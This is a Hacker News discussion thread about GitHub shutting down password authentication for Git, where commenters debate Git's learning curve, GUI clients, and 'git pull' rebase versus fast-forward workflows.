Hacker News new | past | comments | ask | show | jobs | submit login
Git password authentication is shutting down (github.blog)
440 points by judge2020 on Aug 12, 2021 | hide | past | favorite | 339 comments



I'm fine with this change for my usage, I don't think I've used password auth for myself or any automated service I've setup for years now. However, this will introduce more confusion for newcomers who already have to figure out what Git, GitHub, etc are. I just spent some time last weeekend teaching someone the basics of how to create a new project. Such a simple idea required introducing the terminal, basic terminal commands, GitHub, git and its most common commands. It took about 3 hours for us to get through just the most basic pieces. Adding on ssh-keygen, key management adds even more friction.

It's certainly a difficult problem. How can we offer a more gentle learning curve for budding developers while still requiring "real" projects to use best practices for security and development?


I also have found teaching someone how to be even marginally capable of contributing to a Github project from scratch to be a very time consuming and frustrating thing. Think, having your graphics designer able to make commits, or having someone who only wants to update docs.

The worst part is the "easier" solutions are actually just footguns in disguise, as soon as they accidentally click the wrong thing and end up with a detached HEAD, a few commits ahead and behind the REMOTE, and halfway through a botched merge, you have to figure out how to bail them out of that using a GUI you've never actually used. Knowing all this, you either teach them git (high short term pain, high chance of them just giving up immediately) or you tell them to download the first result for "windows foss git gui" and pray that history won't repeat itself.


The solution that everyone actually uses until they learn the unnecessary details is "take a backup of relevant files and blow away & redownload the repo".


https://ohshitgit.com/

It has a few helpful hints.


Relevant xkcd: https://xkcd.com/1597/


The hover text is really good for this one too:

> If that doesn't fix it, git.txt contains the phone number of a friend of mine who understands git. Just wait through a few minutes of 'It's really pretty simple, just think of branches as...' and eventually you'll learn the commands that will fix everything.


wait there is another way?


I've used GitExtensions from the start of my Git usage. I've never had to blow any of my repos away at any point. I also use things like Rebase without thinking about it, something which from what I've read on here is considered a slightly unusual/difficult task.

Using GitExtensions means I can use Git as easily as any other tool, I never give it a second thought. I see the command line commands being executed, but never think about them. The flipside is I'd be knackered if I had to use the command line only.


I used GitExtension for years, but then I switched to Linux some years ago, so I had to find an alternative. I used SourceTree for a while, but I hated the UX. I tried GitKraken when it first came out, but it had a lot of issues that didn't make it appropriate for my workflow. After a couple more years, GitKraken had improved enough that I was able to switch to it. I've been using it for maybe 4 or 5 years now.


The pricing of GitKraken is a little frustrating. 5 pounds a month is quite a hefty price just to be able to use a private repo. Especially since it has not materially changed for my usage, so I would have been much happier giving them the £50 for a single licence.

This is once of those scenarios where subscription for an enterprise might be a thing, but makes no sense for me. The JetBrains model would make sense and I could justify that.


$5/m is honestly peanuts. The amount of value I get from it is way, way more than that. I pay it yearly, like I do for PHPStorm.


But if you get no value from PHPStorm you can stop paying for it and you do not lose access unlike a subscription.

You just don't get new features.

My issue is that I do not get £5 worth of value each month from GitKraken. I get value every couple of months, and it is to explain to other people what they are doing wrong rather than direct value for me.


Then stop paying for it.


Stop paying for what? I don't pay for GitKraken because I can't justify subscribing to software that doesn't materially change.

The risk is that they have to keep "doing stuff" to justify a subscription and we will end up with a new email client.


Hahahahahahaha


GitKraken is amazing, I'm a happy customer through work. makes me happy when electron apps aren't crap.


“Tower” is quite good. Highly recommended.


MacOS and Windows only


    git stash
    git reset --hard master
    git pull
    git stash pop


Uh oh, you've now merged remote master into your local master which was two commits ahead and 3 behind!

My git config has fast-forward only for pulls and I habitually use --ff-only for any pull :)


The command you want is "git pull --rebase". There are configuration settings to make "git pull" rebase by default, and I'd recommend always turning that on that default (which may be by why the person above omitted it from his pull command).

I actually thought "git pull" did "git pull --rebase" by default (this may be what you get from running `git --configure` without modifications?), but maybe I've just been configuring it that way. You can achieve this in your global Git configuration by setting "pull.rebase" to "true".

I don't think it's sane behavior for "git pull" to do anything else besides rebase the local change onto the upstream branch, so I'm surprised it's not the command's default behavior. Has the project not changed the CLI for compatibility reasons or something?

When do you ever want a "git pull" that's not a rebase? That generates a merge commit saying "Merge master into origin/master" (or something similar) which is stupid. If you really want to use actual branches for some reason, that's fine, but "merge master into master" commits are an anti-pattern that if I ever see in a Git repository I'm working on or responsible for, results in me having a conversation with the author about how to use Git correctly.


I actually don't want to rebase. Rebase can rewrite your local history and make it impossible for you to push without doing a force push (or some other more complicated manuevering). The only time pull with rebase is okay (on a shared branch such as master) is when you know that your local branch is strictly behind remote. That's exactly what --ff-only does. It rebases only if you are behind remote, and declines to do so if you are ahead so you can sort your shit out without rewriting history.


If "git pull --rebase" succeeds without reporting a merge conflict, then it's tantamount to having executed the command with "--ff-only".

I believe you are incorrect however. "git pulll --rebase" will not ever rewrite history from the origin repository. It will only ever modify your local unpublished commits to account for new commits from the origin branch. If your change and the new commits from origin aren't touching the same lines or files, then the update is seamless [1].

If there is a conflict because your change and a new commit from origin both changed the same line in the same file, this can result in a merge commit that you need to resolve. But you resolve this locally, by updating your (unpushed, local) commit(s) to account for the new history. When you complete the merge, it will not show up as a merge commit in the repository -- you will simply have simply amended your local unpublished commit(s) only to account for the changes in upstream, and you will have seen every conflict and resolved each one yourself. When the process is complete, and you've resolved the merge, you'll have a nice linear branch where your commit(s) are on the tip of the origin branch.

The flag "--ff-only" basically just means "refuse to start a local merge while performing this operation, and instead fail".

Because of the potential for these merge conflicts, it's a best practice to "git pull" frequently, so that if there are conflicts you can deal with them incrementally (and possibly discuss the software design with coworkers/project partners if the design is beginning to diverge -- and so people can coordinate what they're working on and try to stay out of each other's way), instead of working through a massive pile of conflicts at the end of your "local 'branch'" (i.e. the code in your personal Git repo that constitutes unpushed commits to the upstream branch).

Additionally, all of the central Git repositories I've worked in in a professional context were also configured to disallow "git push --force" (a command that can rewrite history), for all "real" branches. These systems gave users their own private Git repo sandbox (just like you can fork a repo on GitHub) where they can force push if they want to (but is backed up centrally like GitHub to avoid the loss of work). This personal repo was very useful for saving my work. I was in the habit of committing and pushing to the private repo about once every 30m-1h (to eliminate the chance of major work loss due to hardware failure). Almost always I'd squash all of these commits into one before rebasing onto master, so that the change comes in as a single commit, unless it would be too large to review.

In the occasional circumstances where I've legitimately needed to rewrite history for some reason -- say credentials got into the repository, or someone generated one of these "merge master into master" commits -- then I would change HEAD from master to another branch, delete master, and then recreate it with the desired state. (And even that operation would show up in the system's logs, so in the case of something like credentials you'd additionally contact the security or source control team to make sure the commit objects containing the credentials were actually deleted out of the repo history completely, including stuff you can find only via the reflog.) Then contact the team working on the repo to let them know that you had to rewrite history to correct a problem.

I would recommend disabling "git push --force" for all collaborative projects. If you're operating the repository, you can do this by invoking "git config --system receive" and setting "denyNonFastForwards true". In GitHub there's probably a repository setting switch somewhere.

Once professional software engineers start working with Git all day long, they quickly get past the beginner stage and the need to do this kind of stuff is very rare.

[1] It doesn't mean the software will work though, even if both changes would have worked in isolation. You still need to inspect and test the results of "git pull (--ff-only)", since even if there are no conflicts like commits that modify the same lines as yours, or there are conflicts that Git can resolve automatically, it's possible for the resultant software logic to be defective, since Git has no semantic understanding of the code.


> If "git pull --rebase" succeeds without reporting a merge conflict, then it's tantamount to having executed the command with "--ff-only".

this is not correct. git rebase, as with git merge, will automatically resolve conflicts using a 3-way merge algorithm.

> It will only ever modify your local

this is correct.

> unpublished commits

this is not correct. git rebase (in its default mode) rebases all commits that are not upstream onto the upstream. it has nothing to do with whether they are published or not. if you have a published feature branch, and git pull --rebase into it, git rebase will dutifully rebase all your commits.


> I was in the habit of committing and pushing to the private repo about once every 30m-1h (to eliminate the chance of major work loss due to hardware failure).

I get pushing every day, but how unreliable does your PC have to be if you feel you need to push every hour???

> (And even that operation would show up in the system's logs, so in the case of something like credentials you'd additionally contact the security or source control team to make sure the commit objects containing the credentials were actually deleted out of the repo history completely, including stuff you can find only via the reflog.)

You can't un-leak credentials. The only valid action for leaked credentials is to invalidate them, not to pretend that they were never leaked.


> how unreliable does your PC have to be if you feel you need to push every hour???

Hey, I commit and push on a branch on my fork of the repo every time my unit tests work and sometimes if they don't.

It's a single command, `gi`. My joke is "commit/push is the new save" though I'm not that bad...

No one but me has to see that branch. I rely on my rebasing skills and a library of git tools to produce a small number manicured commits out of it with no work.

It works so well. For one, if I am going from one machine to another, I can literally work and then step off my machine and continue on the other with a pull but no interruption.

At any time, I can just send someone a question with a permalink to the code as it was at that moment, and keep working while waiting for the answer.

I never have much uncommitted work in the current branch, so I can almost immediately start a new bugfix in an emergency.

> The only valid action for leaked credentials is to invalidate them,

Quoted for truth.


`git pull --rebase` usually is what I need to do. To save local changes and rebase to the git remote's branch:

  # git branch -av;
  # git remote -v;
  # git reflog; git help reflog; man git-reflog
  # git show HEAD@{0}
  # git log -n5 --graph;
  git add -A; git status;
  git stash; git stash list;
  git pull --rebase;
  #git pull --rebase origin develop
  # git fetch origin develop
  # git rebase origin/develop
  git stash pop;
  git stash list;
  git status;
  # git commit
  # git rebase -i HEAD~5 # squash
  # git push
HubFlow does branch merging correctly because I never can. Even when it's just me and I don't remember how I was handling tags of releases on which branch, I just reach for HubFlow now and it's pretty much good.

There's a way to default to --rebase for pulls: is there a reason not to set that in a global gitconfig? Edit: From https://stackoverflow.com/questions/13846300/how-to-make-git... :

> There are now 3 different levels of configuration for default pull behaviour. From most general to most fine grained they are: […]

  git config --global pull.rebase true


> "git pulll --rebase" will not ever rewrite history from the origin repository. It will only ever modify your local unpublished commits to account for new commits from the origin branch.

After reading more about it, you are right about that. It will only apply your commits to the tip of remote.


as far as i can tell there's no git --configure. you may be confusing it with Xorg -configure, which is (very) obsolete and shouldn't be used.


Yeah. "git pull" is so bad. I wish it didn't exist. Every single time a coworker has gotten into a stuck state is because they used "git pull" which made a merge commit when there shouldn't have been one. It's mostly stopped happening since I yelled at everyone to _please_ configure their machine with ff-only.


Invest in (or build?) an enterprise content management system for people that don't, for whatever reason, think of SCM in terms of commits, branches, and graphs.

If you can make one that thinks in terms of git on the backend, great.

If you want to go a bit further, you could expose the underlying operations to the user. You will need to get them to reason around and interact with the minimal requirements inherent to a versioning system, namely explicit versioning and an explicit commit process, along with explicit merging and conflict resolution.

There are GUI clients that help with some of this, but you're not going to get away from some concept of dealing with branches and merges in any SCM. You hear about it less often, but you'd have the same troubles dealing with a chewed up repository in Perforce, ClearCase, or the like.

(edit: even Subversion!)


I just have non-devs use the browser interface and this seems to work for text edits and image uploads and stuff.

And some statisticians and stuff only know how to use the GitHub desktop client and that works ok for 99% of them. Drives me crazy because I only use cli and struggle to help when they get blocked with the client.


The cynic in me says they’re taking advantage of the fact that the web UI is a lower friction experience to drive more people towards Codespaces (which are not cheap, by the way).


Perhaps, but GitLab had a browser ide earlier, and I think theirs is better. So it’s more likely to just be normal GitHub v GitLab feature competition.


Maybe you could tell your cynic that web Interface are intrinsically easier for people used to them, and that for GitHub, the difference hasn’t changed since times when Codespaces neither existed nor were even planned.


> I also have found teaching someone how to be even marginally capable of contributing to a Github project from scratch to be a very time consuming and frustrating thing. Think, having your graphics designer able to make commits, or having someone who only wants to update docs.

The question really should be why do we want to use git for version control when people really want an backup system where they can essentially update files by uploading a new version of the file.


Frontend developers really like their designers to have versions, because it handles the eternal:

Designer: Hey, I filed a bug for this, it doesn't look like the design. <screenshot of design they changed yesterday>

Developer: Um, we released that like two weeks ago; it's correct according to the design I had at the time.

Designer: Yeah, but this is the design <link to continuously updated document in web editor with no history> Maybe you can just fix it really quick today?

Doesn't have to be git, but some way to match up releases to the design document that was current at that time is quite useful.


A timestamp would be sufficient in that case. If you think of most editors and word processors, they have undo and redo features that allow users to go back and forth in terms of the history of their edits. Those features normally don't support branches and if you make a change in the middle of a redo, you lose access the rest of the other redo steps.

So you could tell the designer that you have the version they sent you on Friday August 13, 2021 at 3:12 PM EDT. Did they make any changes after that, or did they mean to send you a version they made prior to that?


Especially when they use tools that make files that contain all the history through "non-destructive changes" anyway.

But I think the reason is because the mess of folders they then create in DropBox and they can never find their files.

What would be great is if someone could make a TimeMachine for non-developers that uses git, because that is what they are doing in their heads anywy.


Most editors and word processors, along with other applications have undo and redo features that allow them to do that. If that could be tied with a timestamp, then it would be easy to see what version of the file they're working with. The only other feature they may find useful is a way to add a note to the file they saved indicating what changed (which would be the equivalent to a commit message).

Integrating those file(s) as a submodule or subtree in a git repository would work on the development side, but people who generate those files would have no need to interface with git, and people who use git would not need to use the editor for those files to get the history they need.


I've successfully gotten non-devs to use Git via GitKraken. Its interface is simple, but doesn't hide anything. Harder to make mistakes because it actually shows you what's going on, and even has an "Undo" button which lets you back out of mistakes most of the time.


When I was just starting out with git and hadn't really learned enough of the more advanced workflows in git I really wanted gitkraken. Much like the jetbrains software it has a license requirement so that can be a turn-off but if you're trying to teach git in a visual way on teaching projects this software is great.


It's free for open source work, and you can sign up as a student if you're still in school to get it for free for a while.

But yeah, I pay for it now because it's such a significant time saver for my day-to-day. I'm always aware of what my coworkers are doing because it auto-fetches every minute. I use it for code review as well, because I find it really easy and snappy to navigate file changes in a commit (I always use split view, and I almost always have "hide whitespaces changes" on). I has a great interface for interactive rebases as well, allowing to drag to reorder commits, etc. Good built-in merge conflict resolution tool.


Sourcetree has a quite usable free version, I found it very useful as a beginner but haven't used it in the last 4 years.



> Think, having your graphics designer able to make commits, or having someone who only wants to update docs.

GitHub's web interface is pretty good for this.


Not really. People say stuff like this, but what they're really talking about is their own familiarity with GitHub (in the vein of <http://lighttable.com/2014/05/16/pain-we-forgot/>).

What GitHub has going for it is that it is familiar to ("a majority of"?) working developers, and that it's better than both the competition and the Git CLI itself, but from a reality-adjusted perspective, GitHub is pretty bad, too. (Then when people like me make comments like this, others wrongly infer that it comes from a history of false starts and firsthand frustration, unable to conceive that anyone would speak up on this sort of thing if there weren't something personal at stake; no way that it could just be the result of empathy for the uninitiated.)

It's pretty tragic that we've basically killed wikis —like, actual wikis—and regressed back to directories of text files managed by version control systems originally meant for handling program source code. That people then go on to call these wikis is basically an insult to history.

52028d35999a481e7cb19b14eae3bf66cb7c9c4fe2e15b56b55f3ccadffeee1f


Interestingly, Microsoft has a product called TFS that has a great wiki implementation: it's native markdown (with github enhancements), a decent in-browser editor/viewer, and it's backed by git. Plus it has some nice features that let you refer to people with the at-symbol (@) and work items (bugs, tasks, stories, features, etc) with a hash symbol (#), and some other stuff. Github itself has some of these features; I'm not aware of anything else like it (Tiddlywiki, ignoring it's unusual runtime, may be the closest that I'm aware of).


I disagree. I think TFS is an abortion geared around project managers with dev features bolted on. The wiki is ok if you’ve never used other products and their optimizations require an understanding of TFS’ project management suite. I’ve never been able to teach non-TFSers how to use the wiki who don’t commit to learning TFS.


Yes, TFS is overall a survelleince produce for managers. However, that has nothing to do with the wiki implementation included with it, which is quite good. Don't throw the baby out with the bathwater.


I found it hard to use for the primary goal of a wiki: allow contributors to contribute. Wikis need diverse SMEs and it was hard to get SMEs to understand how it worked well enough to contribute and edit content, much less organize. Was able to do this with confluence, mediawiki, and tons of other wiki sites


I mean you could have stuff that requires prs, but you could just use the ui pretty much like a wiki.

1. Go to dev branch

2. Find file and edit it

3. Commit change


That's not "pretty much like a wiki". That's the antithesis of a wiki. You've just described what the wiki was created to replace.


That seems a little drastic, how is it the opposite of a wiki?

What are the steps to edit a wiki? Click edit page, make changes, add comment and submit. That sounds like almost the exact same steps to me.


Try actually measuring it. Fix the 404 link:

https://github.com/solid/solid-rest

(It's the only link in the file.)

Make sure you don't have your thumb on the scale.


The unwillingness to venture into territory that would make the previous claims quantifiable (and falsifiable) is noteworthy.

    $ sha256sum "./PR?-ORLY.txt" 
    52028d35999a481e7cb19b14eae3bf66cb7c9c4fe2e15b56b55f3ccadffeee1f  ./PR?-ORLY.txt
    $ cat "./PR?-ORLY.txt" 
    Did you commit to source control and submit a pull request to post this comment?


Until you need them to rewrite history because it consists of 20 "fix" and "update" commits.


Then don't need them to rewrite history? That's kind of on you and your own OCD at that point. If you are making them use a PR workflow anyway, become friends with git options like using --first-parent to shallowly traverse the DAG and let git's tools give you a clean view. (Or use GitHub's PR Squash options, if you really must rewrite history.)


Someone that does that isn't going to meaningfully rewrite the history anyway, just squash on merge.



Yup, most git UIs or wrappers help someone do the most basic operations without learning any git.

The problem is, as soon as someone needs any of the non-basic operations, they're completely stuck, and have to start out by learning the basics (which they've managed manged to avoid so far).

Plus, each implementation makes up its new terms and abstractions.


Edit: user post-it already said this, sorry.

I'm not experienced here, but is using the GitHub website perhaps the easiest way to submit a PR, that's how I first did it and I think it worked ... I've only really used git privately and for pulling code from public projects.


> The worst part is the "easier" solutions are actually just footguns in disguise, as soon as they accidentally click the wrong thing and end up with a detached HEAD, a few commits ahead and behind the REMOTE, and halfway through a botched merge

Is graphic designer even going to be able to merge things in their files?

It seems that "overwrite my files by data in repository" "apply my changes with message" are all what is necessary? Or is it case of multiple nontechnical people editing files together and expecting to merge changes?


Git merges by default when you pull, for one.

Another extremely common pain is trying to "delete" a local commit.


I can vouch for this TUI interface for git: https://github.com/jesseduffield/lazygit


I suppose contributing is easier with the built-in vs code editor now? (Press `.` when logged in.)

The only thing lacking is public code spaces. I can’t even try them out without paying for GitHub Teams or GitHub Enterprise.


I suppose contributing is easier with the built-in vs code editor now? (Press `.` when logged in.)

Wow, never heard about this (ok I don't follow all possible tech news), but why is this not clearly advertised on github itself? Looks pretty neat and seems to work fine (for what it offers) as well.


Wow, didn't know that shortcut existed.

I can't find `.` on this page: https://docs.github.com/en/get-started/using-github/keyboard...


This is painfully accurate at every step you outlined.


I weep for the world now that git is too difficult to understand.

It used to explain itself through building your own version of git. You have a file named hash that tracks changes on each file named foo... now all the changes are in a directory named hash...now your changes have to be merged with others...

It's kind of up there with next steps after if then else fi. Some things will always be difficult, but diffs and commit and picking one of two possible diffs from two windows should not be one of them.


The issue is not really the base concept. It's layering a huge amount of concepts on top of it.

Just think of the "places" a change can be in (technically most of these are just labels on the tree, but they have separate commands to deal with them).

Remote, Index, working copy, staging area, stash, branches.

Those are the ones involved in the simples way I know how to make the smallest change. When you get up to stuff like submodules, LFS, subtrees then I very much understand when people get frustrated. All most of them wanted is a slight improvement over copying a folder they named myproject_v23 to a network drive.


How about "put your files in this folder then double click this icon (shell script ) ?


VSCode has come a long way in making this easier for newcomers. The Remote repositories extension basically will open up a link in Github to generate the Personal Authentication token to associate with your VSCode app and that's it.

https://code.visualstudio.com/blogs/2021/06/10/remote-reposi...

Combined with things like Codespaces, I can see a lot of intro classes glossing over some of what's happening under the hood.

That said, I really do think that skills like learning how to use a terminal and work through the CLI are necessary for developers to grow. It's not so different from how woodworkers don't just learn how to use a chisel, but also how to sharpen and bevel the tool as well.


> "Such a simple idea required introducing the terminal, basic terminal commands, GitHub, git and its most common commands. It took about 3 hours for us to get through just the most basic pieces."

I don't get this.

"Can you imagine? Learning to program a computer took us some hours!"

What do you expect? That people without prior knowledge or experience just pick up source control in seconds? I'm honestly wondering - what makes you think source control systems are so trivial? Is it really too much to ask a newcomer to invest some hours into learning something these days?


> What do you expect? That people without prior knowledge or experience just pick up source control in seconds?

I mean, ideally, that'd be great. I don't think there's any fundamental reason things can't be this way, many of these complexities are completely incidental, rather than inherent.

> Is it really too much to ask a newcomer to invest some hours into learning something these days?

No, but when I'm learning something, I prefer for my time to be spent on important stuff, not wasted unnecessarily.


I get the argument but I disagree. Git is meant for software developers on projects complex enough to warrant using SCM.

Using SCM for teaching development to newbies is already adding unnecessary complexity (even in a collaborative setting, flows are complex enough to distract from more fundamental topics).

If you're a software developer getting to the point where using git is needed you should absolutely know the core concepts behind public key cryptography, it's going to come up everywhere and you can fuck up big time by publishing the wrong part.


It may be meant for software developers but has legitimate value in other domains. For example, DigitalOcean has their legal team use it as a way of providing diffs on their terms of service and other policies. This type of use case is where it benefits everyone, in my opinion, to reduce the friction to get started.

https://github.com/digitalocean/tos

There are plenty of text file versioning use cases I think, from configuration files for system administrators to LaTeX papers for science students who could benefit and should have an easy path to using it.


I agree with this, I don't know if GitHub already does this with their desktop GUI.


This would be a reasonable point to make if there were reasonable alternatives for simpler version control. But for better or worse the world has standardized on git for all version control. If you want your "two phd student implement a new algorithm in a small python/julia package" to be found/used/talked about you need to be on github.

Heck even if you want to host a static site you probably want to just be on github these days.

Yet to me there is no reason for version control to be this complex. The current github + git universe is locked in, but I don't see why it should be optimal.


> Git is meant for software developers on projects complex enough to warrant using SCM.

There is no such thing as a project not complex enough to warrant a SCM/VCS. There's probably an argument that there is a case where a DVCS is unnecessary, but if you aren't actually doing distributed work there's no reason you need to be aware of more complexity in a DVCS than a non-D VCS.


> There is no such thing as a project not complex enough to warrant a SCM/VCS.

I have a program I wrote that helps me straighten scanned images in bulk. It took maybe an hour to write because I did it in D and was not familiar with the language. Though I have used it for years now and made a few tweaks I have never felt the need to have it in any kind of source control.


> Git is meant for software developers on projects complex enough to warrant using SCM.

I and most developers I know use git or similar for projects of any size, often even if it's "just" a single file or a "one-off" change (because it rarely stays that way).

I would have agreed in the days when Subversion was the closest you could get to "easy version control" but these days in my eyes "the point where using git is needed" is not far from the point where you start making changes to an existing file.


I think this way overestimates the value of both Git and source control in general for a lot of projects. Is this the result of the now common development methodology of using as many dependencies as possible or something?


no, it's often finding out the hard way that you have made a mess and it would be really nice to get back to the working state of an hour ago


It isn't that hard to just make a backup before you do anything messy. That's sorta what I'm getting at: people are using git as a really overcomplicated backup solution. It has the same problem: you forget to commit before making changes and you're still hosed.


Okay, but if you need to do "a backup" more than once, you will inevitably come up with your own shoddy versioning system, even if it consists of littering your project with files named "Copy of 2017-04-20_main_v1 (17).bak.new.old.bad.cpp~".

The alternative is just doing what you always do on every project: run "git init" and occasionally do a "git add -i && git commit". Even if you end up with a lot of non-descriptive snapshots name "WIP" at least you have something resembling a chronology and you can track changes across multiple files at the same time.

If your hobby projects mostly consist of single files with thousands of lines that are easy to unambiguously make copies of for backups, I won't judge you, but your experience is definitely not universal.


> The alternative is just doing what you always do on every project: run "git init" and occasionally do a "git add -i && git commit".

Or I just let my backup software handle it. Automated daily backup supplemented with manually initiated backup if I need a specific point-in-time snapshot.

This isn't rocket science.


Part of the problem is we were all newbies at some point.

I remember the first time I tried to use SCM. It was a collaborative project in college, and our professor recommended we set up a CVS repo (at that point in time, he probably should have recommended SVN, but we didn't know that). We spent about an hour trying to set one up, and eventually concluded it was a waste of time and that we'd just e-mail each other .tar.gz files of the repo and manually sync them. Eventually we did break something and have to go back to the last .tar.gz to un-break it, which wasted another hour or so, but with the friction we'd seen trying to set up CVS, that still seemed preferable to trying SCM again (although it also showed that SCM would have been helpful had we been able to set it up).

GitHub with a password is much easier than setting up a CVS repo as a newbie, and had that been an option then we likely would have succeeded. But I'm much more doubtful that we would have tried and succeeded at token authentication; I also remember how mystifying I found it the first few times I worked somewhere that required it, even understanding the underlying concepts of public key cryptography. The problem is understanding the tools well enough to get it working, and working across operating systems (Linux doesn't have PuTTY; Windows doesn't have the Linux command-line tools; etc.).

When I eventually started using SCM reliably, it was with Mercurial + BitBucket + a password. I recall that I kind of knew I should set up a token, but my first few attempts were unsuccessful (largely due to most instructions being Linux-focused, and being on Windows), and thus I kept using a password for years because making progress on development seemed more useful than figuring out a token. I did use randomly-generated, lengthy, unique passwords, so the risk of using a password seemed pretty low.

So I think this is a bad thing for newcomer-friendliness. Perhaps it is an opportunity for GitLab and whatever other competitors still exist. But I would have rather seen it remain an option, perhaps based on new users choosing whether they're new to Git (allow passwords) or experienced (require tokens, but be able to change it in case they're only experienced with Git, and not with tokens).


Understanding the fundamentals of public key cryptography is a worthy pursuit. Memorizing the idiosyncratic flags of yet another command line tool (or looking them up in the man page every damn time like most people do), instead of having an interface that doesn't require you to relearn it every time you use it, isn't.


Most of the times I use git, I don’t actually need version control, I just want to put my files on Github.


> "Can you imagine? Learning to program a computer took us some hours!"

I wouldn't call installing a vcs "learning to program".

A better analogy might be: "Can you imagine, opening an A4 notepad to take lecture notes took us some hours"

Not a perfect analogy I know but "setting up tools to start learning" != "learning completely"

Either way, I don't really get this kind of aggressive resistance to making things more accessible...


For contrast, Microsoft Word and similar tools have a built-in permanent edit history. Using them requires no more than knowing what menu to find it in. As far as I know it doesn't do branching but for the baseline MVP of "I need to know what this file looked like before we made these changes" it solves the problem with significantly less than "some hours" of training.


> A better analogy might be: "Can you imagine, opening an A4 notepad to take lecture notes took us some hours"

And using a notepad to take notes relies on your having learnt how to read and write in general, which took a significant amount of time.

That being said, I agree with it being good to try make things as accessible as possible, so long as it doesn't impact overall utility.


> what makes you think source control systems are so trivial?

The commenter is referring to the tooling around git, wasting valuable teaching time.

For example, most people will only ever have one ssh key on their device. Having to setup the keyring, and keeping aware of its nuances, is a waste of time.


Curious, in these three hours did you teach your student about git log, checkout $HASH, bisect, revert or any of the other ways that git is actually useful beyond being a glorified FTP ?

Git is a wonderfull tool for exploring a development process unlike anything that’s existed in other domains, but in my experience it is mostly used as a write only tool to deploy code.


Since this was the first session on the topic, we only learned about add, commit, push and had a quick glance at remotes. The goal here is to ease into the normal flow of weite code, commit, push and then follow up with some of the more intricate pieces of git.

It's really important to me that whoever I'm teaching is able to really understand each piece and build their intuition as we build things up.

FTP is a bit orthogonal to the use case here. That being to have her code pushed up to a central repository, able to clone it on her other computer (laptop), and enable me to review it or tweak things.


You're right. A subject being difficult to master means we should do everything we can to make it difficult to learn too.


> "You're right. A subject being difficult to master means we should do everything we can to make it difficult to learn too."

Never before have humans experienced such an overabundance of learning materials (YouTube, blog posts, StackOverflow, books, courses, etc). So much of it easily accessible and available for free. The tooling continually improves.

What most people are missing these days is a goddamned attention span and a dash of humility.

This isn't about mastering source control systems (that can take years). This is about taking a complete newcomer with absolutely no background whatsoever from nothing to something in three hours, which is an absolute miracle in and of itself. Will you also complain about how hard it is to learn how to swim, paint, use chopsticks, change a tire or play chess?


> Never before have humans experienced such an overabundance of learning materials (YouTube, blog posts, StackOverflow, books, courses, etc). So much of it easily accessible and available for free.

Quantity unfortunately doesn't mean quality.

Without experience it is hard to separate low quality from high quality content. And then there's are.many things which are outdated ...


When I learned programming 20 years ago, it went like this

Start QBASIC

Enter:

PRINT "Hello World!"

Run the program.

Congratulations, you wrote your first program and have become a software developer


Right click -> Inspect, Console, 'alert("Hello World!")'


Uh... you can still do that today.

    python3
    > print(“Hello world”)


  >>> print(“Hello world”)
    File "<stdin>", line 1
      print(“Hello world”)
            ^
  SyntaxError: invalid character '“' (U+201C)


You can blame my iPhone for trying to "helpfully" convert my quotes into smart quotes. :(


You’re missing the “install python” step.

Oh and probably you should be using a package manager to do it so figure out which one’s on your system first and learn its interface.

Oh and it’s best practice to create projects in a virtualenv so install that too, and learn how to use it.


The is also a JavaScript programming environment that almost every PC has, the browser. Just open any page and press F12, click the "Console" tab and type `console.log("Hello World")` and you just write your first Hello World.


You can still do that today!

Start ipython (or the interactive interpreter for your language)

Enter:

print("Hello World!") See the result!


Does it still take hours if you're using a client, like GitHub Desktop, SourceTree, or something like that?


No, but doing so results in learned helplessness. "Whoopsie, a fucky wucky happened and the GUI I use for git made a big mess. I'm going to delete my repo and clone it again."


Why do you think using a GUI will make it more likely to fuck up your repo than a using the CLI? Most git GUIs are actually better at warning you that you might be about to do something stupid and making the consequences of you actions more visually clear.


I don't think it does. I've observed it many times. The GUIs don't understand git, have shitty defaults, resulting in unnecessary conflicts and histories which are essentially unreadable (Merge branch 'master' of ... x1000). If any error pops up, it is not read (not their fault - NOBODY reads error message boxes, everyone selects the default action within a fraction of a second), if there is a conflict, they usually cannot resolve it with the GUI, or if they do their changes are lost by accident half the time. So in practice when conflicts happen the changes are copied out, the repository deleted and cloned again (because aborting the merge or resetting the branch is unknown / unsupported by the GUI / too difficult or hidden), changes are pasted back in and committed. SUCCESS!

When you use git directly, you at least get all the tools to solve your problems. When you use (most) frontends, you don't. And you learn: If there are errors, just start over - much easier!

This is not the fault of developers, it's shitty tooling + bad tutorials + bad defaults in tooling + unsuitable defaults in git (git's defaults are for the workflow used in the kernel, NOT the workflow most git users use, which is completely different; it's actually amazing that the same tool can support both workflows pretty well, with the right config settings).


In general I agree with you that Git GUI clients aren't great, but there is at least one exception.

On Windows I use TortoiseGit and although I find certain things to require a few more clicks than I would like, it has been able to handle very nearly everything I have ever needed to do with Git. Management of worktrees seems to be the only thing I wish it would add, but once you add a worktree folder using the command line, it is then able to work with it perfectly fine.

It even recently added dark mode!

Every other Git GUI I've tried only seems to cover "pull", "merge" and "push" workflows competently, at best. If you want to do anything more complex like even a slightly interesting rebase, then they seem to be a nightmare. So I completely agree with your assessment there.

I don't really know Git CLI very well and the thought of using it exclusively seems very inefficient and painful. As with any decent GUI program, TortoiseGit exposes available functionality reasonably well and you don't have to resort to reading a large manual to become proficient.

For both Linux and Mac (which I use rarely to work on issues with a cross-platform Electron app), I have yet to find a Git GUI app that I am satisfied with.

When I looked, Fork appears to be pretty good, I should probably at least try the evaluation and if it's okay just pay the seemingly reasonable $50 fee, but it's a pity it doesn't also support Linux.

I know GitKraken works on Linux, but it's one of those clients which is not nearly powerful enough for my needs and it costs $60 a year, I think GitKraken's popularity is largely driven by their eye-candy and that many Git users don't really understand Git beyond the simple workflows.


This is the same debate as whenever some abstraction layer hides details - high-level vs low-level code, automatic vs manual in a car, coffee pods vs brewing machines, hand-tools vs power-tools, ready-made sauces vs make-from-scratch.

As a novice, you don't understand the benefit provided by the tools, so you don't bother learning them. As an expert, you've forgotten the shape and impact of the massive learning curve faced by the novice so you don't understand why they don't bother overcoming it.

I suspect the 80/20 rule applies here - a GUI provides 80% of the value of a source control system, 80% of the time. If occasionally you do have to delete everything and start again, that may actually be a more effective technique than spending a lot of time learning Git beforehand, despite how crazy it looks from the perspective of an expert.


So we've got the best of both worlds here. If you want to go quickly, use a GUI client, but accept you may run into problems down the road. If you want to be able to leverage more power, you'll need to spend a lot more time developing expertise with the tools.

Either way, GitHub's authentication change doesn't seem to be the problem people are making it out to be.


Most people want to just code, not putz around for hours wrestling with dev environments and tooling.


Are those the same people that will add security, maintainability, performance and logging "later"?


Well, management did say it would be okay to leave it for after the new feature release…


